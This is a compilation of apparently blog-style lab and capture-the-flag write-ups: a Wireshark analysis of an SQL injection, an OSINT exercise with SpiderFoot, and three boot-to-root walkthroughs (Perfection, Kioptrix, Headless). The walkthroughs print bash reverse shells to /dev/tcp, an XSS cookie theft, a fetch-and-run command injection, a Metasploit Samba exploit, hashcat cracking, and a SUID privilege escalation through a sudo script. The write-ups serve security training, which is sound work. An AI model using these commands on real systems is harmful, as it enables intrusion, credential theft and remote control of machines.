The lab file provided is a pcap file so I will open the file using wireshark.

By knowing the attacker’s IP, we can analyze all logs and actions related to that IP and determine the extent of the attack, the duration of the attack, and the techniques used. Can you provide the attacker’s IP?

Using wireshark, I go to Statistics > Conversations

I noticed the huge number of packets sent from 111.224.250.131 ,seems like something so I check it out. Digging on the internet, I found another network analysis tool, NetworkMiner.

That is definitely the attacker’s ip address.

If the geographical origin of an IP address is known to be from a region that has no business or expected traffic with our network, this can be an indicator of a targeted attack. Can you determine the origin city of the attacker?

Did a google search on ip lookup sites. I used https://www.whatismyip.com/ip-address-lookup/ for this question.

Identifying the exploited script allows security teams to understand exactly which vulnerability was used in the attack. This knowledge is critical for finding the appropriate patch or workaround to close the security gap and prevent future exploitation. Can you provide the vulnerable script name?

From the first question, I noticed the use of sqlmap. So I’m looking for some sort of SQL injection.

Back to Wireshark > Statistics > HTTP > Requests

I can clearly see SQL injection been exploited on search.php

Establishing the timeline of an attack, starting from the initial exploitation attempt, What’s the complete request URI of the first SQLi attempt by the attacker?

Tried 1=1 first since it is the simplest SQLi payload combination I know off. Used the find option in wireshark to search for the SQLi payload.

Found it since wireshark arranges packets in chronological order.

Can you provide the complete request URI that was used to read the web server available databases?

I filtered our attacker’s ip against response code 200 then searched for mysql in the packet details.

Make sure to change the search filter from packet list (set by default) to packet details.

We can clearly see the Request URI but why not go a bit deeper!

Then right click on the highlighted packet > Follow > HTTP Stream

Assessing the impact of the breach and data access is crucial, including the potential harm to the organization’s reputation. What’s the table name containing the website users data?

From the previous question, I could see a database name — bookworld_db

I filtered packets from the host against response code 200 then did a database search in packet details. We get quite a small number of responses which we can sort by packet length (I assumed the packet would be longer since the host returned database details).

Check out HTTP Stream on the top most packet after sorting.

And we have a database name!

The website directories hidden from the public could serve as an unauthorized access point or contain sensitive functionalities not intended for public access. Can you provide name of the directory discovered by the attacker?

When asked about hidden directory that contain sensitive functionalities, my first thought was admin panel.

If the attacker managed to access this directory, then the packet is under response code 200. Using the filter from the previous question, I search for ‘admin’ in packet details.

I got a hit!

Knowing which credentials were used allows us to determine the extent of account compromise. What’s the credentials used by the attacker for logging in?

Providing credentials to the host will be under POST requests so let’s filter out all POST requests.

I got 5 requests, time to go through each HTTP stream to find credentials used.

Found the username and password used to login to the admin panel!

The rest of the packets returned invalid username or password

Just for reference

We need to determine if the attacker gained further access or control on our web server. What’s the name of the malicious script uploaded by the attacker?

Uploading falls under POST requests so we refer back to the previous question and find the malicious script from the 5 listed requests.

Checking the HTTP stream gives more insight on the malicious script.

And we’re are done with this Blue Team Lab.

Summary

This is a great lab for those who want to learn how to use wireshark for network forensics. I found NetworkMiner to be a great tool but it can be a bit slow when uploading pcap files.

Difficulty: Easy

Points: 30

OS: Linux

Nmap Scan

Nmap scan report for 10.10.11.253
Host is up (0.39s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We only get 2 open ports. Port 80 suggests we have a webpage so first add the target IP to /etc/hosts.

echo "10.10.11.253 perfection.htb" >> /etc/hosts

There is something else on the bottom of the page.

We have a version number. I will start by looking into WEBrick 1.7.0

WEBrick is an HTTP server toolkit that can be configured as an HTTPS server, a proxy server, and a virtual-host server.

There is no known vulnerability of version 1.7.0 . Let’s keeping digging through the web.

I don’t seem to find anything so I went back to the webpage. Let’s check out the directory, http://perfection.htb/weighted-grade

I tried some XSS on the input form.

Did a dirsearch on the target. Still nothing but I keep going. How about the About page, maybe I could get more info on the target.

Seems like we have error in code from the description on Tina Smith. Susan Miller is a sysadmin so it’s likely there is a user under Susan or Tina for that matter. Let’s go back to the input form. I guess that is our way in.

Finally decided to fire up Burp to give it a go.

Burpsuite

I will capture the POST request from our input form and try injecting some payload.

This part sent me down a rabbit hole trying different payloads. Tried something here and got no error response, might be onto something.

Time to find a payload, I mostly use reverseshells for my payloads.

I will try this and hopefully we get a reverse shell.

We have to encode the payload. For this part, I will use hURL.

$ hURL -B "bash -i >& /dev/tcp/10.10.14.64/9999 0>&1" 

Original       :: bash -i >& /dev/tcp/10.10.14.64/9999 0>&1
base64 ENcoded :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42NC85OTk5IDA+JjE=

$ hURL -U "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42NC85OTk5IDA+JjE="

Original    :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42NC85OTk5IDA+JjE=
URL ENcoded :: YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC42NC85OTk5IDA%2BJjE%3D

Start a listener:

nc -lvnp 9999

Let’s check out our payload.

And I have a shell!

$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.11.253] 43924
bash: cannot set terminal process group (1010): Inappropriate ioctl for device
bash: no job control in this shell
susan@perfection:~/ruby_app$

User Flag:

susan@perfection:~/ruby_app$ cd ..
cd ..
susan@perfection:~$ ls
ls
Migration
ruby_app
user.txt
susan@perfection:~$ cat user.txt

Root Flag:

Tried to run sudo -l as usual but it demands a password:

susan@perfection:~$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

Decided to check directories and files within our user susan. Found a database file with password hashes

susan@perfection:~$ cd Migration
cd Migration
susan@perfection:~/Migration$ ls
ls
pupilpath_credentials.db
susan@perfection:~/Migration$ strings pupilpath_credentials.db
strings pupilpath_credentials.db
SQLite format 3
tableusersusers
CREATE TABLE users (
id INTEGER PRIMARY KEY,
name TEXT,
password TEXT
Stephen Locke154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8S
David Lawrenceff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87aP
Harry Tylerd33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393O
Tina Smithdd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57Q
Susan Millerabeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f

Let’s get cracking!

$ echo "abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f" >> hash.txt

Identify the hash type before cracking

$ hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f

Possible Hashs:
[+] SHA-256
[+] Haval-256

Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
--------------------------------------------------

This is gonna be a tricky one so I head back to the target to find more info on passwords.

Got something on the /var directory

The /var directory contents don't change. This tree is where data that is likely to change is stored. Various databases, spool files, user mail, etc. are located here.

susan@perfection:/var/spool/mail$ cat susan
cat susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students

in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Note that all letters of the first name should be convered into lowercase.

Please hit me with updates on the migration when you can. I am currently registering our university with the platform.

- Tina, your delightful student

We already have a rough idea of what the password looks like so let’s head to hashcat to crack the hash.

$ hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

The flag -m stands for hash type which in our case 1400 is SHA2-256 and -a stands for attack mode hence 3 stands for bruteforce attack or mask attack. ?d stands for integer and since our password has a number between 1 and 1,000,000,000 we are looking for a 9-digit number.

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Sun Apr 14 21:28:57 2024 (4 mins, 32 secs)
Time.Estimated...: Sun Apr 14 21:33:29 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1200.5 kH/s (0.52ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 324557824/1000000000 (32.46%)
Rejected.........: 0/324557824 (0.00%)
Restore.Point....: 324556800/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_126824210 -> susan_nasus_903759210
Hardware.Mon.#1..: Temp: 53c

Password Hash is cracked!

I can gain access to the user using the password. Now I can run sudo commands on the machine.

$ ssh susan@10.10.11.253                    
susan@10.10.11.253's password: 
susan@perfection:~$ sudo su
[sudo] password for susan: 
root@perfection:/home/susan#

cd to /root directory to find root flag.

Conclusion

SHA256 is considered secure but sensitive information in the mail led us to easily crack the password hash. Highly recommended to use alphanumeric passwords to make it harder to crack. It is important to note that use of alphanumeric passwords will not help with data confidentiality and integrity if company policy dictates a specific combination when setting user passwords.

Overview

I will demonstrate how to install SpiderFoot on your attacking machine and how to use the tool. I will show usage by utilizing the challenge, The Spy Who Vanished

Installation

To install SpiderFoot, you need Python 3.7+ and other libraries which can be installed with pip. It is recommended to install the stable build(packaged release) rather than the development build(git).

wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt

Running SpiderFoot

python3 ./sf.py -l 127.0.0.1:5001

This will run SpiderFoot in WebUI mode(which is highly recommended). The command above will bind spiderfoot to localhost on port 5001. Running this will start a web server which can be accessed by a browser of your choice.

I encountered an AttributeError after running the command.

$python3 ./sf.py -l 127.0.0.1:5001 
Traceback (most recent call last):
  File "/spiderfoot-4.0/./sf.py", line 25, in <module>
    import cherrypy
  File "/usr/lib/python3/dist-packages/cherrypy/__init__.py", line 71, in <module>
    from . import _cpdispatch as dispatch
  File "/usr/lib/python3/dist-packages/cherrypy/_cpdispatch.py", line 209, in <module>
    getargspec = inspect.getargspec
                 ^^^^^^^^^^^^^^^^^^
AttributeError: module 'inspect' has no attribute 'getargspec'. Did you mean: 'getargs'?

After digging through the web, I found out that prior to Python 3.5, the inspect module did indeed have a function called getargspec, but it was deprecated in Python 3.5 and removed in Python 3.9

So I opened File “/usr/lib/python3/dist-packages/cherrypy/_cpdispatch.py”, line 209 and replaced getargspec with getargs.

And it worked!

$ python3 ./sf.py -l 127.0.0.1:5001

*************************************************************
 Use SpiderFoot by starting your web browser of choice and 
 browse to http://127.0.0.1:5001/
*************************************************************

2024-04-12 16:28:19,358 [INFO] sf : Starting web server at 127.0.0.1:5001 ...
2024-04-12 16:28:19,372 [WARNING] sf : 
********************************************************************
Warning: passwd file contains no passwords. Authentication disabled.
Please consider adding authentication to protect this instance!
Refer to https://www.spiderfoot.net/documentation/#security.
********************************************************************

Pasting the link to web browser and we are met by:

The Spy Who Vanished

Greetings, Special Agent.

We have received information regarding the long lost spy from MI5, Deloris Frozenwood. She went missing in action a few years ago, never to be seen again. From what we understand, she went on to provide services to whoever the highest bidder might be.

Before she went rogue, Deloris was a revered operative within MI5. Taking on some of the most dangerous assignments and quickly working her way through the ranks. Discontent with management, she took matters into her own hands. Often skirting the lines between rule of law and criminal behavior. She was eventually terminated from MI5.

What happened after her career at MI5 remains shrouded in mystery. She showed up on the radar several times, but only for very brief moments. Having become a target of the organization she once worked for, she’s even gotten arrogant. Often making deliberate appearances for a brief moment, before vanishing to the shadows once again.

Our colleagues at MI5 have asked us to obtain any information on Deloris Frozenwood we can find. They’re particularly interested in social media profiles. For reference, Deloris often appears as “Deloris Frozenwood”, or as “D Frozenwood”.

If you find Deloris, her presence will lead you to the password to unlock your linkfile, containing the link to your contract card for this contract.

As always, the contract is yours, if you choose to accept.

SpiderFoot Usage

SpiderFoot will automatically detect the target type based on the format of your input listed on the right side.

I was not getting any results so I checked logs of the scan and got an error message.

I looked up the error message and got a hit. Apparently, other users had reported the error.

sfp_accounts : Unable to parse social media accounts list: Extra data: line 1 column 4 (char 3) · Issue #1812 · smicallef/spiderfoot

Unfortunately the version packaged with Kali does not parse the latest accounts list.

This should be patched in the latest version on GitHub

 git clone https://github.com/smicallef/spiderfoot.git
 cd spiderfoot
 pip3 install -r requirements.txt
 python3 ./sf.py -l 127.0.0.1:5001

This worked and I got results on the SpiderFoot WebUI.

Seems like our Spy popped up on 31st August 2022 to post a tweet.

Let’s check the tweet and maybe get an answer to the challenge.

The challenge mentioned that we’ll know the answer when we see it. Seems like something to me! Submit your answer and be awarded with a badge from Hacktopia.

I hosted the machine locally on VMware Workstation. Our objective is to gain root access to this machine. Link to the machine is pinned below.

Kioptrix: Level 1 (#1)

Network Discovery:

For this part I used netdiscover but you can use other tools like nmap.

 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 11 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 462              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.52.88   e2:db:7d:66:b6:c3     10     420  Unknown vendor              
 192.168.52.228  00:0c:29:f9:79:3d      1      42  VMware, Inc. 

Nmap Scan:

Nmap scan report for 192.168.52.228
Host is up (0.0042s latency).
Not shown: 994 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:F9:79:3D (VMware)

First I go to the web page as http service is running but we get nothing useful. It returns a test page.

I tried to scan for hidden directories but no luck!

I noticed the machine runs netbios-ssn on port 139/tcp, let’s look into that for now. What is smbd ? — a server to provide SMB/CIFS services to clients

To gain more info on smb, check out this publication by hacktricks_live

139,445 - Pentesting SMB | HackTricks

We can definitely find something here but we have no version. So I’ll fire up metasploit to help us exploit the smb service.

Metasploit Console:

$ msfconsole

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v6.3.31-dev                          ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View advanced module options with 
advanced
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search smb

I got something interesting. An auxiliary module to scan for smb version running on the target.

Worked like a charm!

msf6 > use 111
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
                                       loit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.52.228
RHOSTS => 192.168.52.228
msf6 auxiliary(scanner/smb/smb_version) > exploit

[*] 192.168.52.228:139    - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.52.228:139    -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.52.228:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now that we have the smb version —Samba 2.2.1a , I will go to Google to find a exploit for the samba version provided.

I got an exploit from the first link. According to Rapid7, there is an exploit named “Samba trans2open Overflow”.

So I went back to Metasploit to search for ‘trans2open’. We get multiple exploits but choose the linux version.

msf6 > search trans2open

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)


Interact with a module by name or index. For example info 3, use 3 or use exploit/solaris/samba/trans2open

msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp

Next, we need to set payload as generic reverse shell tcp and set the rhosts to our target ip.

msf6 exploit(linux/samba/trans2open) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf6 exploit(linux/samba/trans2open) > set rhosts 192.168.52.228
rhosts => 192.168.52.228

Finally, run the exploit and you get a root shell.

msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 192.168.52.159:4444 
[*] 192.168.52.228:139 - Trying return address 0xbffffdfc...
[*] 192.168.52.228:139 - Trying return address 0xbffffcfc...
[*] 192.168.52.228:139 - Trying return address 0xbffffbfc...
[*] 192.168.52.228:139 - Trying return address 0xbffffafc...
[*] 192.168.52.228:139 - Trying return address 0xbffff9fc...
[*] 192.168.52.228:139 - Trying return address 0xbffff8fc...
[*] 192.168.52.228:139 - Trying return address 0xbffff7fc...
[*] 192.168.52.228:139 - Trying return address 0xbffff6fc...
[*] Command shell session 1 opened (192.168.52.159:4444 -> 192.168.52.228:32769) at 2024-04-10 13:30:36 +0300

[*] Command shell session 2 opened (192.168.52.159:4444 -> 192.168.52.228:32770) at 2024-04-10 13:30:37 +0300
[*] Command shell session 3 opened (192.168.52.159:4444 -> 192.168.52.228:32771) at 2024-04-10 13:30:38 +0300
[*] Command shell session 4 opened (192.168.52.159:4444 -> 192.168.52.228:32772) at 2024-04-10 13:30:39 +0300
whoami
root

That’s it for this Boot2Root challenge.

Difficulty: Easy

User points: +20

Root points: +25

OS: Linux

I started out with initial nmap scan on the target.

Nmap scan report for headless.htb (10.10.11.8)
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
| ssh-hostkey: 
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  upnp

Nothing to suggest a webpage from the scan report. I tried looking up what upnp is but got nothing useful. I wondered whether the port could lead to a webpage and voila!

Add the target IP to /etc/hosts

10.10.11.8 headless.htb

After exploring the web page, the only option is to hit the “ For questions” button which leads to a new directory.

I got the feeling we might have more hidden directories so let’s do a quick dirsearch on the target.

$ dirsearch -u http://headless.htb:5000

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/wfr/Drop/headless/reports/http_headless.htb_5000/_24-04-07_21-49-56.txt

Target: http://headless.htb:5000/

[21:49:56] Starting: 
[21:50:38] 401 -  317B  - /dashboard
[21:51:08] 200 -    2KB - /support

Task Completed

I will start by looking into /support.

A form huh? Sending information into the form does not give a response so I assume it’s been sent to a server. Interesting! I should try command injection.

Trying this gives the response below.

This gets even more interesting. I notice the cookie: is_admin which does not seem to change with every form input.

Dirsearch gave another directory /dashboard with a 401 status code

I tried to decode the cookie and noticed it has a “user” in it which suggests we can try to manipulate the form into giving us admin cookie.

BurpSuite:

I tried multiple possibilities but couldn’t get anything to work. Injecting payloads into the form gave the “Hacking Attempt Detected” error every single time.

Came across these articles that shed some light to what I was looking for.

• Exploiting XSS-stealing cookies, csrf
• How to steal a cookie using XSS script?

Let’s give it a try!

I suggest use of Repeater for this part.

I added the payload at the ending separating it with “;” and in our User-Agent field.

Server:

Be sure to start a simple python server on port 80.

python3 -m http.server 80

We got something y’all!

Now that we have admin cookie, we can go back to /dashboard ,edit cookies and get access to the page.

Now that we have access to dashboard, I will try to establish a connection to the machine using netcat.

nc -lvnp 9001

Tried modifying the packet to directly establish a connection but failed.

Tried to execute a few commands inside the machine and they seem to work alright. Just need to find a way to create a reverse shell.

Let me try to curl my machine and execute with bash.

$ cat file.sh 
bash -c 'exec bash -i &>/dev/tcp/10.10.14.69/9001<&1'

Don’t forget the python server.

$ python3 -m http.server 80      
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.8 - - [08/Apr/2024 12:16:02] "GET /file.sh HTTP/1.1" 200 -

Sending that request gives a response to our nc server.

$ nc -lvnp 9001                                                         
listening on [any] 9001 ...
connect to [10.10.14.69] from (UNKNOWN) [10.10.11.8] 42862
bash: cannot set terminal process group (1382): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.2$ 

We are in!

User Flag:

bash-5.2$ pwd
pwd
/home/dvir/app
bash-5.2$ cd ..
cd ..
bash-5.2$ ls
ls
app
geckodriver.log
initdb.sh
user.txt
bash-5.2$ cat user.txt

Root Flag:

At this point, I always run sudo -l

bash-5.2$ sudo -l
sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

Analysis of /usr/bin/syscheck shows that it runs a file named ‘initdb.sh’

bash-5.2$ cat /usr/bin/syscheck
cat /usr/bin/syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0

Tried finding the initdb.sh file but seems it doesn’t exist so how about we make one and make it executable to help us gain root access.

Introduction to the Linux chmod command

I will create the file changing the permissions of bash with our users bit, and then run sudo /usr/bin/syscheck.

bash-5.2$ echo "chmod u+s /bin/bash" > initdb.sh
echo "chmod u+s /bin/bash" > initdb.sh
bash-5.2$ chmod +x initdb.sh
chmod +x initdb.sh
bash-5.2$ sudo /usr/bin/syscheck
sudo /usr/bin/syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 1.7G
System load average:  0.00, 0.01, 0.00
Database service is not running. Starting it...

We can now run bash

bash-5.2$ /bin/bash -p
/bin/bash -p
whoami
root

Navigate to the root directory and cat the root flag. That’s it!